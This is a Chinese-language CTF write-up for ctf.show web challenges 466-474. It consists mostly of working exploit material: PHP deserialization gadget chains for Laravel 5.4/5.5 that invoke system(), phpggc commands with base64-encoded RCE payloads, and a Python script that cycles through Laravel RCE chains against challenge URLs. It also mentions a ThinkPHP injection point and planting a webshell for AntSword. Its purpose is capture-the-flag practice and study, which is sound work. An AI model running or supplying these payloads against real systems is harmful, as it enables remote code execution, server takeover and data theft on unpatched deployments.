文章目录
- web 466
- web 467
- web 468
- web469
- web 470
- web 471
- web 472
- web 473
- web 474
- web 475
- web 476
web 466
Laravel5.4版本 ,提交数据需要base64编码
代码审计学习—Laravel5.4 - 先知社区 (aliyun.com)
用第二条链子
反序列化格式 /admin/序列化串base64
<?php
namespace Illuminate\Validation {
class Validator {
public $extensions = [];
public function __construct() {
$this->extensions = ['' => 'system'];
}
}
}
namespace Illuminate\Broadcasting {
use Illuminate\Validation\Validator;
class PendingBroadcast {
protected $events;
protected $event;
public function __construct($cmd)
{
$this->events = new Validator();
$this->event = $cmd;
}
}
echo base64_encode(serialize(new PendingBroadcast('cat /flag')));
}
?>
web 467
Laravel5.5版本 提交数据需要base64编码
参考文章:Laravel5.4 反序列化漏洞挖掘 - 先知社区 (aliyun.com)
第三条链子
<?php
namespace Illuminate\Broadcasting
{
use Illuminate\Events\Dispatcher;
class PendingBroadcast
{
protected $events;
protected $event;
public function __construct($cmd)
{
$this->events = new Dispatcher($cmd);
$this->event=$cmd;
}
}
echo base64_encode(serialize(new PendingBroadcast("cat /flag")));
}
namespace Illuminate\Events
{
class Dispatcher
{
protected $listeners;
public function __construct($event){
$this->listeners=[$event=>['system']];
}
}
}
web 468
Laravel5.5版本 提交数据需要base64编码
我们已经知道原理了,直接工具打吧
从0到1掌握反序列化工具之PHPGGC - 先知社区 (aliyun.com)
查看各种应用各种版本的链子
./phpggc -l
生成链子,这里我们用 RCE3
./phpggc Laravel/RCE3 system "cat /f*"|base64
生成后发现不行,反序列化结果会被调试页面覆盖
那只能带外了
./phpggc Laravel/RCE3 system "cat /f* >1.txt"|base64
Tzo0MDoiSWxsdW1pbmF0ZVxCcm9hZGNhc3RpbmdcUGVuZGluZ0Jyb2FkY2FzdCI6MTp7czo5OiIAKgBldmVudHMiO086Mzk6IklsbHVtaW5hdGVcTm90aWZpY2F0aW9uc1xDaGFubmVsTWFuYWdlciI6Mzp7czo2OiIAKgBhcHAiO3M6MTQ6ImNhdCAvZiogPjEudHh0IjtzOjE3OiIAKgBkZWZhdWx0Q2hhbm5lbCI7czoxOiJ4IjtzOjE3OiIAKgBjdXN0b21DcmVhdG9ycyI7YToxOntzOjE6IngiO3M6Njoic3lzdGVtIjt9fX0K
然后访问 1.txt 就行了
web469
Laravel5.5版本 提交数据需要base64编码
Laravel RCE3 用不了了,我们用 4
./phpggc Laravel/RCE4 system "cat /f*"|base64
Tzo0MDoiSWxsdW1pbmF0ZVxCcm9hZGNhc3RpbmdcUGVuZGluZ0Jyb2FkY2FzdCI6Mjp7czo5OiIAKgBldmVudHMiO086MzE6IklsbHVtaW5hdGVcVmFsaWRhdGlvblxWYWxpZGF0b3IiOjE6e3M6MTA6ImV4dGVuc2lvbnMiO2E6MTp7czowOiIiO3M6Njoic3lzdGVtIjt9fXM6ODoiACoAZXZlbnQiO3M6NzoiY2F0IC9mKiI7fQo=
web 470
又出现 debug 页面了。而且还得换 RCE9
./phpggc Laravel/RCE9 system "cat /f* > 1.txt"|base64
Tzo0MDoiSWxsdW1pbmF0ZVxCcm9hZGNhc3RpbmdcUGVuZGluZ0Jyb2FkY2FzdCI6Mjp7czo5OiIAKgBldmVudHMiO086MjU6IklsbHVtaW5hdGVcQnVzXERpc3BhdGNoZXIiOjU6e3M6MTI6IgAqAGNvbnRhaW5lciI7TjtzOjExOiIAKgBwaXBlbGluZSI7TjtzOjg6IgAqAHBpcGVzIjthOjA6e31zOjExOiIAKgBoYW5kbGVycyI7YTowOnt9czoxNjoiACoAcXVldWVSZXNvbHZlciI7czo2OiJzeXN0ZW0iO31zOjg6IgAqAGV2ZW50IjtPOjM4OiJJbGx1bWluYXRlXEJyb2FkY2FzdGluZ1xCcm9hZGNhc3RFdmVudCI6MTp7czoxMDoiY29ubmVjdGlvbiI7czoxNToiY2F0IC9mKiA+IDEudHh0Ijt9fQo=
然后访问 1.txt
web 471
和上面一样
web 472
Laravel8.1版本 提交数据需要base64编码
写一个脚本遍历所有 rce
import os
import requests
for i in range(1,20):
data=os.popen(f"./phpggc Laravel/RCE{i} system 'cat /f* >1.txt'|base64").read()
url = f"https://36c90604-17a4-483d-b420-c4a064444212.challenge.ctf.show/admin/{data}"
requests.get(url)
res = requests.get("https://36c90604-17a4-483d-b420-c4a064444212.challenge.ctf.show/1.txt").text
if 'ctfshow' in res:
print(res)
print(f"RCE{i}success!")
python3 attack.py
web 473
thinkphp5.0.15默认控制器的部分代码,使用默认路由:
public function inject(){
$a=request()->get('a/a');
db('users')->insert(['username'=>$a]);
return 'done';
}
快一点吧直接工具梭哈了
web 474
Thinkphp v5.x 远程代码执行漏洞复现及POC集合-CSDN博客
扫这个没有
https://c5996b11-8db9-42d8-a43d-2ac4d7f5e605.challenge.ctf.show/public/index.php
得扫目录
https://c5996b11-8db9-42d8-a43d-2ac4d7f5e605.challenge.ctf.show/public
但是没有回显,写🐎进去
蚁剑连接